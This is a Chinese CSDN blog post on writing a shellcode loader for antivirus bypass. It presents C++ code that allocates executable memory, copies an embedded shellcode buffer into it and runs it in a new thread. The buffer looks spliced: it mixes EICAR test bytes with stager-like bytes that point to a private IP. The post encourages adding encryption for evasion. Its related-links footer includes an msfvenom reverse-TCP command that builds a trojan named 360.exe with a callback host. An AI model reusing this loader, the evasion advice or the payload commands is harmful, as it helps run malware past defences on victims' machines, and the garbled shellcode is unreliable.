​Shellcode执行工具编写思路(一)

最新推荐文章于 2021-09-10 18:56:00 发布
最新推荐文章于 2021-09-10 18:56:00 发布
阅读量379 收藏
点赞数
分类专栏: 内网渗透 网络安全 Bypass
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nocker888/article/details/116596878
版权

​Shellcode执行工具编写思路

之前在MS08067实验室发过,我寻思着自己可以做个技术分析的公众号,写写文章分析给大家琢磨,也可以提升一下自己的技术。

这是一段C++加载器的代码,代码来自倾旋大佬的博客,先看大佬给的注释。

#include<Windows.h>

 

 

//入口函数

intwmain(intargc,TCHAR*argv[]){

 

    intshellcode_size=0;// shellcode长度

    DWORDdwThreadId;// 线程ID

    HANDLEhThread;// 线程句柄

/*length: 800 bytes */

 

unsignedcharbuf[]="\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x37\x30\x2e\x31\x32\x38\x00\x00\x00\x00\x00";

 

//获取shellcode大小

shellcode_size=sizeof(buf);

 

/*

VirtualAlloc(

    NULL, // 基址

    800, // 大小

    MEM_COMMIT, // 内存页状态

    PAGE_EXECUTE_READWRITE // 可读可写可执行

    );

*/

 

char*shellcode=(char*)VirtualAlloc(

    NULL,

    shellcode_size,

    MEM_COMMIT,

    PAGE_EXECUTE_READWRITE

    );

    // 将shellcode复制到可执行的内存页中

CopyMemory(shellcode,buf,shellcode_size);

 

hThread=CreateThread(

    NULL,// 安全描述符

    NULL,// 栈的大小

    (LPTHREAD_START_ROUTINE)shellcode,// 函数

    NULL,// 参数

    NULL,// 线程标志

    &dwThreadId// 线程ID

    );

 

WaitForSingleObject(hThread,INFINITE);// 一直等待线程执行结束

    return0;

}

从大佬的注释就可以很明确的看出来使用VirtualAlloc函数申请内存,然后使用CopyMemory将shellcode复制到目标内存中,CreateThread创建一个新的线程。

VirtualAlloc百度的解释:

VirtualAlloc是一个Windows API函数,该函数的功能是在调用进程的虚地址空间,预定或者提交一部分页。

简单点的意思就是申请内存空间。

这里我来用易语言复现一下这个过程,易语言比较适合刚接触的人理解吧。

这里Shellcode 需要转换为字节集才可以在易语言上面运行

OK,成功运行,也就说明我们的思路是没有问题的。

加载器的思路没有问题,那么我们就可以对shellcode 进行加密免杀或者分离免杀。

明确了思路,那么Github 搜索 各位师傅们的吊炸天的Bypass 脚本,自己拿来修改一下,那么就是又一个屌炸天的Bypass。

文章可能简单,主要讲解思路。

下一篇,介绍分离免杀的思路

庸人自扰#7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一个简单的ShellCode执行器&代码(just for fun)
HingC~
11-13 3327
最近看到有个问题:如何做到在程序运行时读入并执行一段代码 这是很容易做到的,能够运行是因为冯·诺依曼结构中程序和数据并没有本质区别. 其实完全没有必要读入代码运行,动态链接库完全可以胜任这方面的需求 在运行时读入代码并执行其实是完全可行的,脚本语言更容易做到,当然了C/C++也可以,写个解释器吧 考虑最简单的情况,何为代码?机械码算不算代码呢?当然算啦 我们先观察一下代码是怎
简单的shellcode制作
renyizou的博客
06-16 226
一串机器能执行的代码 msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.183.202 LPORT=4343 -f exe > 360.exe 生成一个名字叫360.exe的木马 此时还需要一个监听端--msf中的监听模块 use exploit/multi/handler 设置好lhost和lpost,记得设置payload,开启监听 运行木马 就能建立session,直接就进去了 linux ..
go-shellcode - Go语言编写ShellCode执行工具.zip
最新发布
07-18
go-shellcode - Go语言编写ShellCode执行工具.zip
shellcode 执行
01-04
//msfvenom -p windows/exec CMD=calc.exe -f exe -e x86/shikata_ga_nai -i 6 -f c 生成shellcod 测试数据: bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 将shellcode作为参数传入执行盒,./shllcode_Argv.exe bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 即可执行该段shellcode。 该exe可传vt查看报毒情况,无特征码
shellcode_generator:shellcode,生成器,Visual Studio,C ++,Windows
03-09
shellcode_generator shellcode,生成器,Visual Studio,C ++,Windows
shellcode执行盒_简单shellcode学习
weixin_39849127的博客
12-06 146
本文由“合天智汇”公众号首发 作者:hope引言之前遇到没开启NX保护的时候,都是直接用pwtools库里的shellcode一把梭,也不太懂shellcode代码具体做了些什么,遇到了几道不能一把梭的题目,简单学习一下shellcode编写。前置知识NX(堆栈不可执行)保护shellcode(一段16进制的数据,转化为字符串则为汇编代码)pwnable之start保护检测可以看到这道题目什么保...
shellcode分析工具.zip
05-25
用来加载shellcode的程序,execsc.exe是cuckoo自带的,sc_test.exe是导师给的。
shellcode转unicode工具
06-13
这是一款超级便宜的shellcode转unicode工具,非常好用!
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s <format> ...
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
程序界面,可自定义任意shellcode 注入任意进程 此程序自带将msf的远控shellcode转换成 易语言 可调用的shellcode 同时还可以将注入的功能生成出自己的程序可调用的代码 双击第三个输入框即可生成shellcode,这里默认的shellcode是远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行shellcode 这里说明一下哈,这里是可以自定义shellcode进行注入的,并不是必须使用msf生成的shellcode进行注入 这里将自己扣出来的shellcode放在第一个输入框就行了,十进制的机器码之间以半角符逗号分隔开 生成的shellcode给自己的代码调用 记得要配合上 精易模块 进行使用 当然了 也可以自己手动补dll进去 以下为关键代码的截图 使用易语言好几年了,从最初的进厂打工(满心的无奈) 到现在的安全工程师,易语言是带我入门的语言 也是我至今最喜欢的语言之一 易语言对于我来说更多的是一种说不上来的感觉 对于我来说易语言是有生命的 也是易语言赐予了我入门这行的基础(很扎实很扎实) 此工具是前两天匆忙写出来的,如果有哪里做的不够好以及觉得此程序很烂的大佬们不要喷我 以下为下载地址 此程序使用了精易模块以及未闻花名的 皮肤模块
使用shellcode动态加载dll-易语言
06-11
注入dll,执行代码啥的
易语言-QQ内存取key通用版 shellcode形式
06-25
易语言-QQ内存取key通用版 shellcode形式
shellcode转换工具
07-26
shellcode转换工具
通过shellcode调用信息框-易语言
06-12
通过shellcode调用信息框,这种方法可以动态执行服务器下发的代码
Shellcode 藏在图片中
12-07
最近某安全会议上的某个的PPT,是英文的,内容如题所示是关于shellcode隐藏技术的。
WIN7下可执行ShellCode
小神兵之技术篇
01-16 4301
#include #include int main() { byte shellcode[] = { 0xE9, 0x96, 0x00, 0x00, 0x00, 0x56, 0x31, 0xC9, 0x64, 0x8B, 0x71, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x1C, 0x8B, 0x46, 0x08, 0x8B, 0x7E, 0x
ShellCode 指南
阿波的专栏
12-22 1711
这边文章是 翻译的 ShellCode 系列文章,有利于ShellCode入门。(详细参见: ShellCode指南) 1: 概述和工具1 1.1 概述1 1.2 Windows与Linux的Shellcode 有什么不同?2 1.3 建立环境2 1.4 其他工具4 1.4.1 Metasploit4 1.4.2 OllyDbg 1.104 1.4.3 lcc-win324
shellcode加载器
goat_2003的博客
09-10 1539
编写shellcode不能使用绝对地址,因为当我们加载到其他函数中时绝对地址储存的可能什么也没有,甚至是其他函数,所以当我们需要调用一个函数时,需要动态获取函数的地址实现调用。 想要动态获取函数地址,可以使用以下函数 GetProcAddress 从dll中获取函数的地址 LoadLibraryA 将指定的模块加载到调用进程的地址空间中 举个例子: LPVOID lp = GetProcAddress(LoadLibraryA("user32.dll"),"MessageBoxA"); _asm {
shellcode编写
06-28
Shellcode是一种在操作系统内核中执行的二进制代码。它通常用于漏洞利用和恶意软件中。编写shellcode需要了解汇编语言和操作系统内部工作原理。步骤包括确定目标系统平台、编写汇编代码、使用汇编器将代码转换为机器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值